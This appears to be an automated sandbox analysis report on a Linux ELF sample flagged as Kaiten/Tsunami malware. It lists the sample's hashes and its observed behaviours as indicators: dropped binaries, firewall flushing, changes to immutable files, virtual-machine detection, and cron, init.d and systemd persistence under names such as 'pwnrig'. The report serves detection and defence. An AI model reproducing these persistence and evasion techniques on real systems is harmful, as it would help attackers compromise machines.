Analysis
-
max time kernel
149s -
max time network
154s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240226-en -
resource tags
arch:amd64arch:i386image:ubuntu1804-amd64-20240226-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system -
submitted
13-03-2024 02:11
General
-
Target
2f1854f309c913068700c0c3efec3a84ea48e62393df38bab9c8233053e2b19b.elf
-
Size
7.0MB
-
MD5
c91421f0d68095890b50a034dbf9d060
-
SHA1
624e0d9c94309de8d038b2e21cf07685d2020fdb
-
SHA256
2f1854f309c913068700c0c3efec3a84ea48e62393df38bab9c8233053e2b19b
-
SHA512
63d174cf0ba590aa836a9c4490ef7982d7590d8fcf9f67b8a8021dc23755a4aecf16805a12679e566d6d6bec45a4d3344d62197a7f3c6660c46812594888bd88
-
SSDEEP
49152:FdvgYnvuqgrb/TGvO90dL3BmAFd4A64nsfJYgJi1QjpzkpDKzBzQgQHDSZ/+/A5X:YqpgxDFnEqZJvlNiPt9y7LxXk5prrT
Malware Config
Signatures
-
Detects Kaiten/Tsunami Payload 10 IoCs
Processes:
resource yara_rule behavioral1/memory/1828-1-0x00007f4c202d7000-0x00007f4c202eb700-memory.dmp family_kaiten2 behavioral1/memory/2177-4-0x00007fc93e329000-0x00007fc93e33d700-memory.dmp family_kaiten2 behavioral1/memory/2895-9-0x00007f2fe77e7000-0x00007f2fe77fb700-memory.dmp family_kaiten2 behavioral1/memory/3265-12-0x00007fc65ac07000-0x00007fc65ac1b700-memory.dmp family_kaiten2 behavioral1/memory/3292-13-0x00007f77e99b0000-0x00007f77e99c4700-memory.dmp family_kaiten2 behavioral1/memory/3662-16-0x00007fa3a7e6c000-0x00007fa3a7e80700-memory.dmp family_kaiten2 behavioral1/memory/4032-19-0x00007feaff725000-0x00007feaff739700-memory.dmp family_kaiten2 behavioral1/memory/4402-22-0x00007f429bb81000-0x00007f429bb95700-memory.dmp family_kaiten2 behavioral1/memory/4782-25-0x00007fc352293000-0x00007fc3522a7700-memory.dmp family_kaiten2 behavioral1/memory/5152-28-0x00007f854a212000-0x00007f854a226700-memory.dmp family_kaiten2 -
Detects Kaiten/Tsunami payload 10 IoCs
Processes:
resource yara_rule behavioral1/memory/1828-1-0x00007f4c202d7000-0x00007f4c202eb700-memory.dmp family_kaiten behavioral1/memory/2177-4-0x00007fc93e329000-0x00007fc93e33d700-memory.dmp family_kaiten behavioral1/memory/2895-9-0x00007f2fe77e7000-0x00007f2fe77fb700-memory.dmp family_kaiten behavioral1/memory/3265-12-0x00007fc65ac07000-0x00007fc65ac1b700-memory.dmp family_kaiten behavioral1/memory/3292-13-0x00007f77e99b0000-0x00007f77e99c4700-memory.dmp family_kaiten behavioral1/memory/3662-16-0x00007fa3a7e6c000-0x00007fa3a7e80700-memory.dmp family_kaiten behavioral1/memory/4032-19-0x00007feaff725000-0x00007feaff739700-memory.dmp family_kaiten behavioral1/memory/4402-22-0x00007f429bb81000-0x00007f429bb95700-memory.dmp family_kaiten behavioral1/memory/4782-25-0x00007fc352293000-0x00007fc3522a7700-memory.dmp family_kaiten behavioral1/memory/5152-28-0x00007f854a212000-0x00007f854a226700-memory.dmp family_kaiten -
Executes dropped EXE 31 IoCs
Processes:
knlibsys-helperservice-agentservice-agentsys-helperservice-agentservice-agentservice-agentservice-agentsys-helperservice-agentservice-agentsys-helpersys-helperservice-agentservice-agentsys-helperservice-agentservice-agentioc pid process /etc/init.d/knlib 1766 knlib /tmp/sys-helper 1828 sys-helper /tmp/service-agent 1830 service-agent /tmp/service-agent 2077 service-agent /tmp/sys-helper 2177 sys-helper /tmp/service-agent 2178 service-agent /tmp/service-agent 2446 service-agent /tmp/service-agent 2549 service-agent /tmp/service-agent 2817 service-agent /tmp/sys-helper 2895 sys-helper /tmp/service-agent 2919 service-agent /tmp/service-agent 3187 service-agent /tmp/sys-helper 3265 sys-helper /tmp/sys-helper 3292 sys-helper /tmp/service-agent 3293 service-agent /tmp/service-agent 3561 service-agent /tmp/sys-helper 3662 sys-helper /tmp/service-agent 3663 service-agent /tmp/service-agent 3931 service-agent /tmp/sys-helper 4032 /tmp/service-agent 4033 /tmp/service-agent 4301 /tmp/sys-helper 4402 /tmp/service-agent 4403 /tmp/service-agent 4671 /tmp/sys-helper 4782 /tmp/service-agent 4783 /tmp/service-agent 5051 /tmp/sys-helper 5152 /tmp/service-agent 5153 /tmp/service-agent 5421 -
Flushes firewall rules 12 IoCs
Flushes/ disables firewall rules inside the Linux kernel.
Processes:
iptablesupdate-rc.dupdate-rc.dupdate-rc.dupdate-rc.dupdate-rc.dufwupdate-rc.dpid process 1761 iptables 2238 update-rc.d 2609 update-rc.d 2979 update-rc.d 3353 update-rc.d 3723 update-rc.d 5213 1582 ufw 1890 update-rc.d 4093 4463 4843 -
Processes:
modprobeioc pid process /lib/modules/4.15.0-213-generic/kernel/net/ipv6/netfilter/ip6_tables.ko 1589 modprobe -
Processes:
resource yara_rule /bin/knlib5 upx /tmp/sys-helper upx /tmp/service-agent upx -
Attempts to change immutable files 64 IoCs
Modifies inode attributes on the filesystem to allow changing of immutable files.
Processes:
sedchattrchattrchattrchattrshchattrhostnamechattrchattrchattrchattrchattrhostnamechattrchattrshchattrchattrchattrchattrchattrchattrhostnamechattrchattrsedshchattrchattrchattrhostnamepid process 2339 sed 2918 chattr 2978 chattr 3284 chattr 4025 4398 4830 2237 chattr 5195 3332 sh 4022 2705 chattr 4037 4557 2104 hostname 3283 chattr 2591 chattr 4026 4770 4771 2547 chattr 2961 chattr 4021 4397 4698 5314 1826 chattr 2473 hostname 4399 4825 1879 chattr 3352 chattr 4087 4189 5140 1831 sh 3455 chattr 5315 2914 chattr 2703 chattr 3289 chattr 3653 chattr 4023 4089 4827 1823 chattr 3297 hostname 4774 5142 5144 2909 chattr 3657 chattr 4020 5151 3080 sed 1869 sh 2225 chattr 4029 4565 4695 5448 1765 chattr 2907 chattr 3214 hostname -
Checks CPU configuration 1 TTPs 60 IoCs
Checks CPU information which indicate if the system is a virtual machine.
Processes:
grepgrepgrepgrepgrepservice-agentservice-agentservice-agentgrepgrepgrepgrepgrepgrepservice-agentgrepgrepgrepgrepservice-agentservice-agentgrepgrepservice-agentservice-agentservice-agentgrepservice-agentgrepservice-agentgrepgrepservice-agentgrepdescription ioc process File opened for reading /proc/cpuinfo File opened for reading /proc/cpuinfo grep File opened for reading /proc/cpuinfo grep File opened for reading /proc/cpuinfo grep File opened for reading /proc/cpuinfo grep File opened for reading /proc/cpuinfo grep File opened for reading /proc/cpuinfo File opened for reading /proc/cpuinfo service-agent File opened for reading /proc/cpuinfo service-agent File opened for reading /proc/cpuinfo service-agent File opened for reading /proc/cpuinfo File opened for reading /proc/cpuinfo File opened for reading /proc/cpuinfo grep File opened for reading /proc/cpuinfo grep File opened for reading /proc/cpuinfo File opened for reading /proc/cpuinfo grep File opened for reading /proc/cpuinfo grep File opened for reading /proc/cpuinfo grep File opened for reading /proc/cpuinfo grep File opened for reading /proc/cpuinfo File opened for reading /proc/cpuinfo File opened for reading /proc/cpuinfo service-agent File opened for reading /proc/cpuinfo File opened for reading /proc/cpuinfo grep File opened for reading /proc/cpuinfo File opened for reading /proc/cpuinfo File opened for reading /proc/cpuinfo File opened for reading /proc/cpuinfo grep File opened for reading /proc/cpuinfo File opened for reading /proc/cpuinfo File opened for reading /proc/cpuinfo grep File opened for reading /proc/cpuinfo grep File opened for reading /proc/cpuinfo service-agent File opened for reading /proc/cpuinfo service-agent File opened for reading /proc/cpuinfo File opened for reading /proc/cpuinfo grep File opened for reading /proc/cpuinfo grep File opened for reading /proc/cpuinfo service-agent File opened for reading /proc/cpuinfo File opened for reading /proc/cpuinfo File opened for reading /proc/cpuinfo service-agent File opened for reading /proc/cpuinfo service-agent File opened for reading /proc/cpuinfo grep File opened for reading /proc/cpuinfo File opened for reading /proc/cpuinfo File opened for reading /proc/cpuinfo File opened for reading /proc/cpuinfo File opened for reading /proc/cpuinfo service-agent File opened for reading /proc/cpuinfo File opened for reading /proc/cpuinfo grep File opened for reading /proc/cpuinfo File opened for reading /proc/cpuinfo service-agent File opened for reading /proc/cpuinfo grep File opened for reading /proc/cpuinfo grep File opened for reading /proc/cpuinfo File opened for reading /proc/cpuinfo File opened for reading /proc/cpuinfo service-agent File opened for reading /proc/cpuinfo grep File opened for reading /proc/cpuinfo File opened for reading /proc/cpuinfo -
Checks hardware identifiers (DMI) 1 TTPs 64 IoCs
Checks DMI information which indicate if the system is a virtual machine.
Processes:
service-agentservice-agentservice-agentservice-agentservice-agentservice-agentservice-agentservice-agentservice-agentservice-agentservice-agentservice-agentdescription ioc process File opened for reading /sys/devices/virtual/dmi/id/sys_vendor service-agent File opened for reading /sys/devices/virtual/dmi/id/product_name File opened for reading /sys/devices/virtual/dmi/id/board_vendor File opened for reading /sys/devices/virtual/dmi/id/board_vendor service-agent File opened for reading /sys/devices/virtual/dmi/id/sys_vendor service-agent File opened for reading /sys/devices/virtual/dmi/id/product_name service-agent File opened for reading /sys/devices/virtual/dmi/id/board_vendor service-agent File opened for reading /sys/devices/virtual/dmi/id/bios_vendor service-agent File opened for reading /sys/devices/virtual/dmi/id/bios_vendor File opened for reading /sys/devices/virtual/dmi/id/sys_vendor service-agent File opened for reading /sys/devices/virtual/dmi/id/bios_vendor service-agent File opened for reading /sys/devices/virtual/dmi/id/product_name service-agent File opened for reading /sys/devices/virtual/dmi/id/board_vendor service-agent File opened for reading /sys/devices/virtual/dmi/id/product_name service-agent File opened for reading /sys/devices/virtual/dmi/id/board_vendor File opened for reading /sys/devices/virtual/dmi/id/sys_vendor File opened for reading /sys/devices/virtual/dmi/id/board_vendor File opened for reading /sys/devices/virtual/dmi/id/bios_vendor service-agent File opened for reading /sys/devices/virtual/dmi/id/bios_vendor service-agent File opened for reading /sys/devices/virtual/dmi/id/sys_vendor service-agent File opened for reading /sys/devices/virtual/dmi/id/sys_vendor service-agent File opened for reading /sys/devices/virtual/dmi/id/product_name File opened for reading /sys/devices/virtual/dmi/id/product_name File opened for reading /sys/devices/virtual/dmi/id/sys_vendor File opened for reading /sys/devices/virtual/dmi/id/product_name service-agent File opened for reading /sys/devices/virtual/dmi/id/board_vendor service-agent File opened for reading /sys/devices/virtual/dmi/id/product_name service-agent File opened for reading /sys/devices/virtual/dmi/id/bios_vendor File opened for reading /sys/devices/virtual/dmi/id/product_name service-agent File opened for reading /sys/devices/virtual/dmi/id/sys_vendor File opened for reading /sys/devices/virtual/dmi/id/product_name service-agent File opened for reading /sys/devices/virtual/dmi/id/board_vendor File opened for reading /sys/devices/virtual/dmi/id/bios_vendor service-agent File opened for reading /sys/devices/virtual/dmi/id/board_vendor service-agent File opened for reading /sys/devices/virtual/dmi/id/bios_vendor service-agent File opened for reading /sys/devices/virtual/dmi/id/bios_vendor service-agent File opened for reading /sys/devices/virtual/dmi/id/bios_vendor File opened for reading /sys/devices/virtual/dmi/id/sys_vendor File opened for reading /sys/devices/virtual/dmi/id/product_name File opened for reading /sys/devices/virtual/dmi/id/sys_vendor File opened for reading /sys/devices/virtual/dmi/id/bios_vendor service-agent File opened for reading /sys/devices/virtual/dmi/id/product_name service-agent File opened for reading /sys/devices/virtual/dmi/id/sys_vendor service-agent File opened for reading /sys/devices/virtual/dmi/id/sys_vendor service-agent File opened for reading /sys/devices/virtual/dmi/id/bios_vendor service-agent File opened for reading /sys/devices/virtual/dmi/id/product_name service-agent File opened for reading /sys/devices/virtual/dmi/id/bios_vendor File opened for reading /sys/devices/virtual/dmi/id/sys_vendor File opened for reading /sys/devices/virtual/dmi/id/bios_vendor File opened for reading /sys/devices/virtual/dmi/id/bios_vendor File opened for reading /sys/devices/virtual/dmi/id/bios_vendor File opened for reading /sys/devices/virtual/dmi/id/board_vendor service-agent File opened for reading /sys/devices/virtual/dmi/id/sys_vendor service-agent File opened for reading /sys/devices/virtual/dmi/id/board_vendor service-agent File opened for reading /sys/devices/virtual/dmi/id/bios_vendor service-agent File opened for reading /sys/devices/virtual/dmi/id/sys_vendor service-agent File opened for reading /sys/devices/virtual/dmi/id/bios_vendor service-agent File opened for reading /sys/devices/virtual/dmi/id/product_name File opened for reading /sys/devices/virtual/dmi/id/sys_vendor service-agent File opened for reading /sys/devices/virtual/dmi/id/board_vendor File opened for reading /sys/devices/virtual/dmi/id/sys_vendor File opened for reading /sys/devices/virtual/dmi/id/product_name File opened for reading /sys/devices/virtual/dmi/id/board_vendor File opened for reading /sys/devices/virtual/dmi/id/board_vendor -
Creates/modifies Cron job 1 TTPs 64 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
Processes:
2f1854f309c913068700c0c3efec3a84ea48e62393df38bab9c8233053e2b19b.elfteesedteesedcrontabteeteesedsedteecrontabteesedcrontabsedcrontabdescription ioc process File opened for modification /etc/cron.hourly/.lib-knlib4 2f1854f309c913068700c0c3efec3a84ea48e62393df38bab9c8233053e2b19b.elf File opened for modification /etc/cron.d/pwnrig tee File opened for modification /etc/cron.d/sed9iaGSE sed File opened for modification /etc/cron.monthly/pwnrig File opened for modification /etc/cron.daily/seddCy7eF sed File opened for modification /etc/cron.monthly/pwnrig tee File opened for modification /etc/cron.monthly/sedIyTeLF sed File opened for modification /var/spool/cron/crontabs/tmp.veCA7F crontab File opened for modification /etc/cron.weekly/pwnrig File opened for modification /etc/cron.d/.lib-knlib4 File opened for modification /etc/cron.weekly/pwnrig tee File opened for modification /etc/cron.daily/sedZeO2Va sed File opened for modification /etc/cron.weekly/sed7SePcq sed File opened for modification /var/spool/cron/.lib-knlib4 2f1854f309c913068700c0c3efec3a84ea48e62393df38bab9c8233053e2b19b.elf File opened for modification /etc/cron.monthly/pwnrig tee File opened for modification /etc/cron.monthly/sedXUHydt sed File opened for modification /etc/cron.monthly/pwnrig tee File opened for modification /etc/cron.daily/sedY8Bi2s sed File opened for modification /etc/cron.weekly/sedWpUhel sed File opened for modification /etc/cron.weekly/pwnrig tee File opened for modification /etc/cron.d/sedqTnN7c File opened for modification /etc/cron.d/sed8KEbx5 File opened for modification /var/spool/cron/crontabs/tmp.Rl0xjR File opened for modification /etc/cron.daily/sedjHw119 File opened for modification /etc/cron.monthly/sedMEY9T3 File opened for modification /etc/cron.monthly/seduV5Mon File opened for modification /etc/cron.monthly/pwnrig tee File opened for modification /etc/cron.d/sedEvzlq8 File opened for modification /etc/cron.hourly/pwnrig File opened for modification /etc/cron.daily/pwnrig tee File opened for modification /etc/cron.d/sedC7Yf7y sed File opened for modification /var/spool/cron/crontabs/tmp.2NSZMm crontab File opened for modification /etc/cron.hourly/pwnrig tee File opened for modification /etc/cron.daily/sedmwZeOR sed File opened for modification /etc/cron.monthly/pwnrig File opened for modification /etc/cron.d/sedDu4bcn File opened for modification /etc/cron.d/pwnrig File opened for modification /etc/cron.d/.lib-knlib4 2f1854f309c913068700c0c3efec3a84ea48e62393df38bab9c8233053e2b19b.elf File opened for modification /etc/cron.daily/pwnrig tee File opened for modification /etc/cron.weekly/sedA9xmL7 File opened for modification /etc/cron.hourly/pwnrig File opened for modification /etc/cron.hourly/sedvi4arG File opened for modification /etc/cron.hourly/sed2anSW6 File opened for modification /etc/cron.hourly/pwnrig File opened for modification /etc/cron.d/sedPzkMzq sed File opened for modification /etc/cron.daily/pwnrig tee File opened for modification /etc/cron.monthly/sed6nZiO9 sed File opened for modification /etc/cron.monthly/.lib-knlib4 2f1854f309c913068700c0c3efec3a84ea48e62393df38bab9c8233053e2b19b.elf File opened for modification /etc/cron.monthly/.lib-knlib4 File opened for modification /etc/cron.d/pwnrig tee File opened for modification /etc/cron.hourly/pwnrig tee File opened for modification /etc/cron.d/sedrZV7jQ sed File opened for modification /etc/cron.weekly/.lib-knlib4 2f1854f309c913068700c0c3efec3a84ea48e62393df38bab9c8233053e2b19b.elf File opened for modification /var/spool/cron/crontabs/tmp.B4PRml crontab File opened for modification /etc/cron.monthly/pwnrig tee File opened for modification /etc/cron.d/pwnrig File opened for modification /etc/cron.hourly/pwnrig tee File opened for modification /etc/cron.weekly/pwnrig File opened for modification /etc/cron.daily/pwnrig File opened for modification /etc/cron.monthly/sed6rI5RV sed File opened for modification /etc/cron.hourly/sedmbKRBF sed File opened for modification /etc/cron.weekly/.lib-knlib4 File opened for modification /var/spool/cron/crontabs/tmp.pHJcTK crontab File opened for modification /etc/cron.hourly/sed3tnEBy sed -
Enumerates running processes
Discovers information about currently running processes on the system
-
Processes:
teeteeteesedsedsedteeteesedsed2f1854f309c913068700c0c3efec3a84ea48e62393df38bab9c8233053e2b19b.elfteeseddescription ioc process File opened for modification /etc/init.d/pwnrig tee File opened for modification /etc/init.d/pwnrig tee File opened for modification /etc/init.d/pwnrig tee File opened for modification /etc/init.d/sedFvQMFg File opened for modification /etc/init.d/sedeb0me0 File opened for modification /etc/init.d/sedSJnK84 File opened for modification /etc/init.d/sed0DStVq sed File opened for modification /etc/init.d/sedJ5Xl3s sed File opened for modification /etc/init.d/sedb5l600 sed File opened for modification /etc/init.d/pwnrig tee File opened for modification /etc/init.d/pwnrig tee File opened for modification /etc/init.d/sedO5MQTN sed File opened for modification /etc/init.d/sed3tZYKF sed File opened for modification /etc/init.d/pwnrig File opened for modification /etc/init.d/pwnrig File opened for modification /etc/init.d/sedCq4ZxQ File opened for modification /etc/init.d/knlib 2f1854f309c913068700c0c3efec3a84ea48e62393df38bab9c8233053e2b19b.elf File opened for modification /etc/init.d/pwnrig tee File opened for modification /etc/init.d/pwnrig File opened for modification /etc/init.d/pwnrig File opened for modification /etc/init.d/sed0kqbPa sed -
Modifies systemd 1 TTPs 21 IoCs
Adds/ modifies systemd service files. Likely to achieve persistence.
Processes:
teeteeteeteetee2f1854f309c913068700c0c3efec3a84ea48e62393df38bab9c8233053e2b19b.elfteedescription ioc process File opened for modification /etc/systemd/system/pwnrige.service tee File opened for modification /lib/systemd/system/pwnrigl.service tee File opened for modification /lib/systemd/system/pwnrigl.service tee File opened for modification /etc/systemd/system/pwnrige.service tee File opened for modification /etc/systemd/system/pwnrige.service File opened for modification /lib/systemd/system/pwnrigl.service File opened for modification /lib/systemd/system/pwnrigl.service tee File opened for modification /lib/systemd/system/pwnrigl.service tee File opened for modification /etc/systemd/system/pwnrige.service tee File opened for modification /lib/systemd/system/pwnrigl.service tee File opened for modification /etc/systemd/system/pwnrige.service tee File opened for modification /etc/systemd/system/pwnrige.service File opened for modification /etc/systemd/system/knlibe.service 2f1854f309c913068700c0c3efec3a84ea48e62393df38bab9c8233053e2b19b.elf File opened for modification /etc/systemd/system/pwnrige.service tee File opened for modification /etc/systemd/system/pwnrige.service tee File opened for modification /lib/systemd/system/pwnrigl.service File opened for modification /lib/systemd/system/pwnrigl.service File opened for modification /lib/systemd/system/pwnrigl.service File opened for modification /lib/systemd/system/pwnrigl.service tee File opened for modification /etc/systemd/system/pwnrige.service File opened for modification /etc/systemd/system/pwnrige.service -
Reads CPU attributes 1 TTPs 64 IoCs
Processes:
pspkillservice-agentservice-agentservice-agentpspspkillservice-agentpsservice-agentservice-agentservice-agentpspspspspsservice-agentpkillpsservice-agentpspkillpkillpspsservice-agentservice-agentpspsdescription ioc process File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online File opened for reading /sys/devices/system/cpu/online File opened for reading /sys/devices/system/cpu/types File opened for reading /sys/devices/system/cpu/online File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/types service-agent File opened for reading /sys/devices/system/cpu/types service-agent File opened for reading /sys/devices/system/cpu/possible service-agent File opened for reading /sys/devices/system/cpu/online File opened for reading /sys/devices/system/cpu/possible File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/possible service-agent File opened for reading /sys/devices/system/cpu/online File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online service-agent File opened for reading /sys/devices/system/cpu/types service-agent File opened for reading /sys/devices/system/cpu/types File opened for reading /sys/devices/system/cpu/online File opened for reading /sys/devices/system/cpu/online File opened for reading /sys/devices/system/cpu/online File opened for reading /sys/devices/system/cpu/types service-agent File opened for reading /sys/devices/system/cpu/possible File opened for reading /sys/devices/system/cpu/online service-agent File opened for reading /sys/devices/system/cpu/types service-agent File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online service-agent File opened for reading /sys/devices/system/cpu/online File opened for reading /sys/devices/system/cpu/possible service-agent File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/possible File opened for reading /sys/devices/system/cpu/possible File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/types service-agent File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/types File opened for reading /sys/devices/system/cpu/online service-agent File opened for reading /sys/devices/system/cpu/online service-agent File opened for reading /sys/devices/system/cpu/online File opened for reading /sys/devices/system/cpu/online service-agent File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online File opened for reading /sys/devices/system/cpu/online service-agent File opened for reading /sys/devices/system/cpu/online File opened for reading /sys/devices/system/cpu/online File opened for reading /sys/devices/system/cpu/online File opened for reading /sys/devices/system/cpu/online File opened for reading /sys/devices/system/cpu/possible service-agent File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/types File opened for reading /sys/devices/system/cpu/online File opened for reading /sys/devices/system/cpu/online service-agent -
Reads hardware information 1 TTPs 64 IoCs
Accesses system info like serial numbers, manufacturer names etc.
Processes:
service-agentservice-agentservice-agentservice-agentservice-agentservice-agentservice-agentservice-agentservice-agentservice-agentservice-agentservice-agentdescription ioc process File opened for reading /sys/devices/virtual/dmi/id/board_serial service-agent File opened for reading /sys/devices/virtual/dmi/id/bios_date service-agent File opened for reading /sys/devices/virtual/dmi/id/chassis_vendor service-agent File opened for reading /sys/devices/virtual/dmi/id/chassis_asset_tag service-agent File opened for reading /sys/devices/virtual/dmi/id/chassis_version service-agent File opened for reading /sys/devices/virtual/dmi/id/bios_date service-agent File opened for reading /sys/devices/virtual/dmi/id/bios_date service-agent File opened for reading /sys/devices/virtual/dmi/id/chassis_serial service-agent File opened for reading /sys/devices/virtual/dmi/id/board_name service-agent File opened for reading /sys/devices/virtual/dmi/id/chassis_asset_tag service-agent File opened for reading /sys/devices/virtual/dmi/id/chassis_type service-agent File opened for reading /sys/devices/virtual/dmi/id/bios_version service-agent File opened for reading /sys/devices/virtual/dmi/id/chassis_serial service-agent File opened for reading /sys/devices/virtual/dmi/id/product_uuid service-agent File opened for reading /sys/devices/virtual/dmi/id/chassis_serial service-agent File opened for reading /sys/devices/virtual/dmi/id/board_asset_tag File opened for reading /sys/devices/virtual/dmi/id/board_serial service-agent File opened for reading /sys/devices/virtual/dmi/id/bios_version service-agent File opened for reading /sys/devices/virtual/dmi/id/chassis_vendor service-agent File opened for reading /sys/devices/virtual/dmi/id/board_name service-agent File opened for reading /sys/devices/virtual/dmi/id/board_name File opened for reading /sys/devices/virtual/dmi/id/chassis_asset_tag File opened for reading /sys/devices/virtual/dmi/id/chassis_asset_tag service-agent File opened for reading /sys/devices/virtual/dmi/id/product_serial service-agent File opened for reading /sys/devices/virtual/dmi/id/board_asset_tag service-agent File opened for reading /sys/devices/virtual/dmi/id/product_version service-agent File opened for reading /sys/devices/virtual/dmi/id/chassis_asset_tag File opened for reading /sys/devices/virtual/dmi/id/chassis_asset_tag File opened for reading /sys/devices/virtual/dmi/id/chassis_serial File opened for reading /sys/devices/virtual/dmi/id/bios_version File opened for reading /sys/devices/virtual/dmi/id/chassis_asset_tag service-agent File opened for reading /sys/devices/virtual/dmi/id/product_serial service-agent File opened for reading /sys/devices/virtual/dmi/id/board_asset_tag service-agent File opened for reading /sys/devices/virtual/dmi/id/chassis_vendor File opened for reading /sys/devices/virtual/dmi/id/board_serial File opened for reading /sys/devices/virtual/dmi/id/chassis_serial service-agent File opened for reading /sys/devices/virtual/dmi/id/board_version service-agent File opened for reading /sys/devices/virtual/dmi/id/board_asset_tag service-agent File opened for reading /sys/devices/virtual/dmi/id/product_version File opened for reading /sys/devices/virtual/dmi/id/product_serial service-agent File opened for reading /sys/devices/virtual/dmi/id/board_serial service-agent File opened for reading /sys/devices/virtual/dmi/id/chassis_version service-agent File opened for reading /sys/devices/virtual/dmi/id/chassis_version service-agent File opened for reading /sys/devices/virtual/dmi/id/bios_version service-agent File opened for reading /sys/devices/virtual/dmi/id/bios_version File opened for reading /sys/devices/virtual/dmi/id/chassis_version service-agent File opened for reading /sys/devices/virtual/dmi/id/board_asset_tag service-agent File opened for reading /sys/devices/virtual/dmi/id/board_name File opened for reading /sys/devices/virtual/dmi/id/chassis_asset_tag File opened for reading /sys/devices/virtual/dmi/id/board_name File opened for reading /sys/devices/virtual/dmi/id/chassis_type File opened for reading /sys/devices/virtual/dmi/id/board_asset_tag service-agent File opened for reading /sys/devices/virtual/dmi/id/bios_version service-agent File opened for reading /sys/devices/virtual/dmi/id/chassis_type File opened for reading /sys/devices/virtual/dmi/id/product_serial File opened for reading /sys/devices/virtual/dmi/id/chassis_vendor service-agent File opened for reading /sys/devices/virtual/dmi/id/chassis_asset_tag service-agent File opened for reading /sys/devices/virtual/dmi/id/chassis_type File opened for reading /sys/devices/virtual/dmi/id/board_serial service-agent File opened for reading /sys/devices/virtual/dmi/id/chassis_vendor service-agent File opened for reading /sys/devices/virtual/dmi/id/product_version File opened for reading /sys/devices/virtual/dmi/id/chassis_version File opened for reading /sys/devices/virtual/dmi/id/chassis_vendor service-agent File opened for reading /sys/devices/virtual/dmi/id/bios_date -
Writes file to system bin folder 1 TTPs 41 IoCs
Processes:
2f1854f309c913068700c0c3efec3a84ea48e62393df38bab9c8233053e2b19b.elfcpcpcpcpcpcpcpcpcpcpcpcpcpcpcpcpcpcpcpcpcpcpcpcpdescription ioc process File opened for modification /bin/bprofr File opened for modification /bin/sysdr File opened for modification /bin/knlib5 2f1854f309c913068700c0c3efec3a84ea48e62393df38bab9c8233053e2b19b.elf File opened for modification /bin/initdr cp File opened for modification /bin/sysdr cp File opened for modification /bin/bprofr cp File opened for modification /bin/crondr File opened for modification /bin/crondr cp File opened for modification /bin/bprofr cp File opened for modification /bin/initdr cp File opened for modification /bin/crondr cp File opened for modification /bin/crondr cp File opened for modification /bin/bprofr File opened for modification /bin/crondr File opened for modification /bin/crondr File opened for modification /bin/sysdr File opened for modification /bin/sysdr File opened for modification /bin/sysdr cp File opened for modification /bin/crondr cp File opened for modification /bin/sysdr cp File opened for modification /bin/crondr File opened for modification /bin/bprofr File opened for modification /bin/initdr File opened for modification /bin/bprofr cp File opened for modification /bin/initdr cp File opened for modification /bin/crondr cp File opened for modification /bin/initdr File opened for modification /bin/sysdr File opened for modification /bin/sysdr cp File opened for modification /bin/initdr cp File opened for modification /bin/bprofr cp File opened for modification /bin/sysdr cp File opened for modification /bin/initdr cp File opened for modification /bin/sysdr cp File opened for modification /bin/initdr cp File opened for modification /bin/bprofr cp File opened for modification /bin/bprofr File opened for modification /bin/initdr File opened for modification /bin/bprofr cp File opened for modification /bin/crondr cp File opened for modification /bin/initdr -
Enumerates kernel/hardware configuration 1 TTPs 64 IoCs
Reads contents of /sys virtual filesystem to enumerate system information.
Processes:
service-agentservice-agentservice-agentservice-agentservice-agentservice-agentservice-agentservice-agentservice-agentservice-agentservice-agentservice-agentdescription ioc process File opened for reading /sys/bus/cpu/devices/cpu0/cache/index3/size File opened for reading /sys/bus/cpu/devices/cpu0/cache/index8/shared_cpu_map File opened for reading /sys/bus/cpu/devices/cpu0/cache/index0/number_of_sets File opened for reading /sys/bus/node/devices/node0/access0/initiators File opened for reading /sys/devices/system/node/online File opened for reading /sys/bus/node/devices/node0/access0/initiators/read_bandwidth service-agent File opened for reading /sys/bus/dax/devices service-agent File opened for reading /sys/bus/cpu/devices/cpu0/cache/index0/number_of_sets service-agent File opened for reading /sys/bus/cpu/devices/cpu0/cache/index0/size File opened for reading /sys/bus/cpu/devices/cpu0/cache/index7/shared_cpu_map service-agent File opened for reading /sys/bus/cpu/devices/cpu0/topology/core_id service-agent File opened for reading /sys/bus/cpu/devices/cpu0/cache/index2/number_of_sets service-agent File opened for reading /sys/fs/cgroup/cpuset/cpuset.mems service-agent File opened for reading /sys/bus/cpu/devices/cpu0/cache/index1/type File opened for reading /sys/fs/cgroup/cpuset/cpuset.cpus service-agent File opened for reading /sys/devices/system/node/online service-agent File opened for reading /sys/bus/cpu/devices/cpu0/topology/core_id service-agent File opened for reading /sys/bus/cpu/devices/cpu0/cache/index2/type File opened for reading /sys/bus/node/devices/node0/hugepages/hugepages-2048kB/nr_hugepages service-agent File opened for reading /sys/bus/cpu/devices/cpu0/cpufreq/base_frequency File opened for reading /sys/bus/node/devices/node0/hugepages File opened for reading /sys/bus/cpu/devices/cpu0/cache/index2/coherency_line_size File opened for reading /sys/bus/cpu/devices/cpu0/cache/index2/physical_line_partition File opened for reading /sys/devices/virtual/dmi/id service-agent File opened for reading /sys/bus/cpu/devices/cpu0/cache/index3/physical_line_partition service-agent File opened for reading /sys/bus/node/devices/node0/access0/initiators service-agent File opened for reading /sys/bus/cpu/devices/cpu0/cache/index0/number_of_sets File opened for reading 